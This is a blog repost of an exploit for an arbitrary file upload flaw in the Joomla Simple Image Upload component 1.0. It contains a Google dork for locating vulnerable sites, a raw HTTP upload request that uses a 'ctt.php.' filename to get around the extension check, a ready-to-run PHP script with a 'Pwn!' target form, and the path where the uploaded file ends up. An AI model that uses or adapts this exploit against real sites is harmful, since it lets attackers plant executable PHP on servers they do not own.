-->

Joomla Simple Image Upload - Arbitrary File Upload

By 7:06 PM Add Comment Edit 



# Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload
# Google Dork: inurl:option=com_simpleimageupload
# Date: 23.06.2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: http://tuts4you.de/
# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
# Version: 1.0
# Tested on: MsWin32
 
# Vuln Same to Com_Media Vulnerability
 
# Live Request :
 
POST /index.php?option=com_simpleimageupload&
view=upload&tmpl=component&e_name=desc HTTP/1.1
 
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) 
Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/index.php?option=com_simpleimageupload&
view=upload&tmpl=component&e_name=desc
Connection: keep-alive
Content-Type: multipart/form-data;
 boundary=---------------------------247062787817068
 
 
-----------------------------247062787817068\r\n
Content-Disposition: form-data; name="Filedata"; 
filename="ctt.php."\r\n
Content-Type: application/x-php\r\n
\r\n
0wn3d ! ;)\r\n
-----------------------------247062787817068\r\n
Content-Disposition: form-data; name="return-url"\r\n
\r\n
aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYW
Qmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
-----------------------------247062787817068--\r\n
 
 
# Exploit :
 

<input name="target" type="text" value="www.localhost.com">
<input name="Pwn" type="submit" value="Pwn!">
';
 
 
if($_POST) { 
     
    $target = $_POST['target'];
 
$file = "0wn3d ! ;)"; 
$header = array("Content-Type: application/x-php",
"Content-Disposition: form-data; name=\"Filedata\"; file=\"ctt.php.\"");
 
$ch = curl_init("http://".$target."
/index.php?option=com_simpleimageupload&
task=upload.upload&tmpl=component");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0
 (Windows NT 6.3; WOW64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36");
curl_setopt($ch, CURLOPT_POSTFIELDS,
 array('Filedata'=>"@$file", "return-url" =>
 "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmd
mlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",)); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
 
} else { die(); }
?>
 
 
# Path of File : 127.0.0.1/images/[Rand0mString]ctt.php

Berlangganan update artikel terbaru via email:

0 Response to "Joomla Simple Image Upload - Arbitrary File Upload"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel